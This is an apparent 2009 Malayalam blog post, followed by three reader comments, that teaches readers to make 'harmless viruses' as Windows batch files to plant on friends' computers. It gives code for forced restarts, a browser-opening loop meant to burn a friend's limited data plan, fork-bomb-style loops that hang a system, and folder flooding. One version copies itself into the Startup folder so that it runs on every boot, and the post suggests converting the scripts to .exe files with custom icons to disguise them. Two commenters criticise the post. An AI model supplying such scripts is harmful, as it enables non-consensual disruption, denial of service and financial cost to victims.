നിര്ദ്ദോഷികളായ വൈറസുകള്‍

>> Wednesday, January 28, 2009

നിര്ദ്ദോഷികളായ വൈറസുകള്‍




ബോഗ്ഗെനു (നിര്‍ദ്ദോഷകരമായ)ഉടായിപ്പ് പരിപാടികളോട് ഭയങ്കര ഇഷ്ടമാണ്.പ്രത്യേകിച്ച് വൈറസ് പ്രോഗ്രാമുകളോട്.കുറച്ചു നാളായി ഇതിനെപ്പറ്റി ഗവേഷണം നടത്തിയ ബ്ലോഗ്ഗെന്‍ അത്യാവശ്യം പച്ച പിടിച്ചു തുടങ്ങി.ബ്ലോഗ്ഗെന്റെ കൈയ്യില്‍ നിന്നു പോകുന്ന സി ഡി കളിലും പെന്‍ഡ്രൈവുകളിലും മറ്റും ഇതൊക്കെ പരീക്ഷിച്ചു വിജയം കണ്ടു തുടങ്ങി.നിങ്ങള്ക്ക് വേണ്ടി(ബുജികളോടല്ല പാവം ബ്ലോഗ്ഗേര്‍സിനോട് ) ചില നിര്‍ദ്ദോഷകരമായ വൈറസുകള്‍ ഉണ്ടാക്കുന്നതു ഞാന്‍ കാണിച്ചു തരാം.

സാധാരണയായി വൈറസുകള്‍ ഉണ്ടാക്കന്‍(ഞാനല്ല തലയുള്ളവന്‍) c,c++ എന്നിവയാണു ഉപയോഗിക്കുന്നതു.നമുക്കു നിര്‍ദ്ദോഷകരമായ വൈറസ് ഉണ്ടാക്കാന്‍ .bat എന്ന ഫോര്‍മാറ്റ് ഉപയൊഗിക്കാം.വിന്‍ഡൊസിലെ MS DOS കമാന്റുകളാണു ഇവ.

Hi എന്ന വാക്കു കൊണ്ടു ഒരാളെ എങ്ങനെ ബുദ്ധിമുട്ടിക്കാം എന്നു നമുക്കു നോക്കാം
ആദ്യമായി നോട്ട് പാഡ് തുറക്കുക.അതിനു ശേഷം താഴെ കാണുന്ന കോഡ് റ്റൈപ്പ് ചെയ്യുക

:loop
echo hi
goto loop




അതിനു ശേഷം .bat(Filename.bat)എന്നു സേവ് ചെയ്യുക Save As Type എന്ന ഒപ്ഷനില്‍ All സെലക്ട് ചെയ്യുക.





അടുത്തതായി ഷട്ട്-ഡൌണ്‍ ചെയ്യാന്‍ ഉള്ള ഒരു പ്രോഗ്രാം നോക്കാം


shutdown -r -t 60 -c
"Your Message Here"




60-Time in second


നിങ്ങളുടെ കൂട്ടൂകാരനു കുറഞ്ഞ പ്ലാനിലുള്ള(BSNL 125,250)നെറ്റ് ആണോ ഉപയോഗിക്കുന്നതു.എങ്കില്‍ അവന്റെ യൂസെജ് കൂട്ടാനുള്ള മാര്‍ഗ്ഗം.


@echo off
:loop

START "C:\Program Files\Internet Explorer\Iexplore.exe" http://www.google.com
START "C:\Program Files\Internet Explorer\Iexplore.exe" http://www.yahoo.com
goto loop



ഇതില്‍ START "C:\Program Files\Internet Explorer\Iexplore.exe" http://www.yahoo.com എന്ന കോഡ് നിങ്ങള്ക്കു ഇഷ്ടമുള്ള അത്രയും തവണ കൊടുക്കാം. http://www.yahoo.com അല്ലെങ്കില്‍ http://www.google.com സ്ഥാനത്തു പേജ് സൈസ് കൂടിയ(nasa,youtube) സൈറ്റിന്റെ പേരു കോടുക്കാം.


അടുത്തതായി സിസ്റ്റം ഹാങ് ആകുന്ന ഒരു പ്രോഗ്രം

@echo off
:loop

md
start
goto loop


നിങ്ങളുടേ സുഹ്രുത്തിന്റെ സിസ്റ്റത്തില്‍ ഫോള്ഡര്‍ കോണ്ടു നിറക്കാനുള്ള പ്രോഗ്രാം


@echooff
:loop
FOR /L %%G IN (1,1,1000) DO (
C:%%G
)
goto loop


C: മാറ്റി നിങ്ങള്ക്ക് ഇഷ്ടമുള്ള ലോക്കേഷന്‍ കൊടുക്കാം

നിങ്ങളുടെ സുഹ്രുത്ത് കമ്പുട്ടെറില്‍ ശിശു ആണെങ്കില്‍ കമ്പൂട്ടെര്‍ ഫോര്‍മാറ്റ് ചെയ്യേണ്ട അവസ്ഥ വരെ എത്തിക്കനുള്ള പ്രോഗ്രാം

@echo off
copy virus.bat "%userprofile%\start menu\programs\startup\virus.bat"
:loop

md
start
goto loop


മുകളിലത്തെ കോഡില്‍ നിങ്ങള്‍ ചെയ്യുന്ന പ്രോഗ്രാം virus.bat എന്നു സേവു ചെയ്യുകയോ അല്ലെങ്കില്‍ virus.bat യുടെ സ്ഥാനത്തു നിങ്ങള്‍ പ്രോഗ്രമിനു നല്‍കുന്ന പേരോ നല്‍കുക


ഇവ പൊതുവെ നിര്‍ദ്ദോഷകരമായ പ്രോഗ്രാമുകള്‍ ആണു.പിന്നെ ഇവ ഒരു ഭംഗിയില്ലത്ത ഐക്കണിലാണു കാണുന്നതു.അതു മാറ്റാന്‍ നെറ്റില്‍ തപ്പിയാല്‍ Bat To Exe കണ്‍വെര്‍ട്ടര്‍ കിട്ടും.ഐക്കണ്‍ ഒക്കെ കൊടുത്തു നമുക്ക് ഇവ സെറ്റ് അപ്പ് ആക്കാവുന്നതാണ്..ബ്ലോഗ്ഗെനു പണി കിട്ടിയില്ലെങ്കില്‍ തീര്‍ച്ചയായും ഇതിന്റെ രണ്ടാം ഭാഗം ഉണ്ടായിരിക്കും എന്നു പറഞ്ഞുകൊണ്ടു ബ്ലോഗ്ഗെന്‍ നിര്ത്തുന്നു.

3 comments:

മുക്കുവന്‍ January 28, 2009 at 12:24 PM  

as sanghparivar member, ideas are also not much different...!

do something good in your young age :)

Anonymous January 29, 2009 at 11:05 AM  

പ്രിയ സുഹ്രുത്തേ..
ഒരു ലിങ്ക് കിട്ടി വന്നതാണ് ഇവിടെ.
താങ്കള്‍ ഒന്ന് ശ്രദ്ധിക്കൂ..എത്ര ബ്ലോഗര്‍മാരുണ്ട് ഇത്തരം ജനോപദ്രവകരമായ പോസ്റ്റുകള്‍ ഇടുന്നത് എന്ന് നോക്കൂ. ഇത്തരം വെറുപ്പിക്കുന്ന പോസ്റ്റ് ഒഴിവാക്കി മുക്കുവന്‍ പറഞ്ഞതുപോലെ എന്തെങ്കിലും നല്ല പോസ്റ്റുകള്‍ നല്‍കൂ.(ഒരു സിസ്റ്റം എഞ്ചിനീയര്‍ ആയതുകൊണ്ട് പറയട്ടെ..ഇതൊന്നുമല്ല ഹാക്കിംഗ്!!)
ആശംസകള്‍

(പബ്ലിഷ് ചെയ്യണമെന്നില്ല.)

ഉപ ബുദ്ധന്‍ January 31, 2009 at 7:38 PM  

ആളു കൊള്ളാമല്ലോ?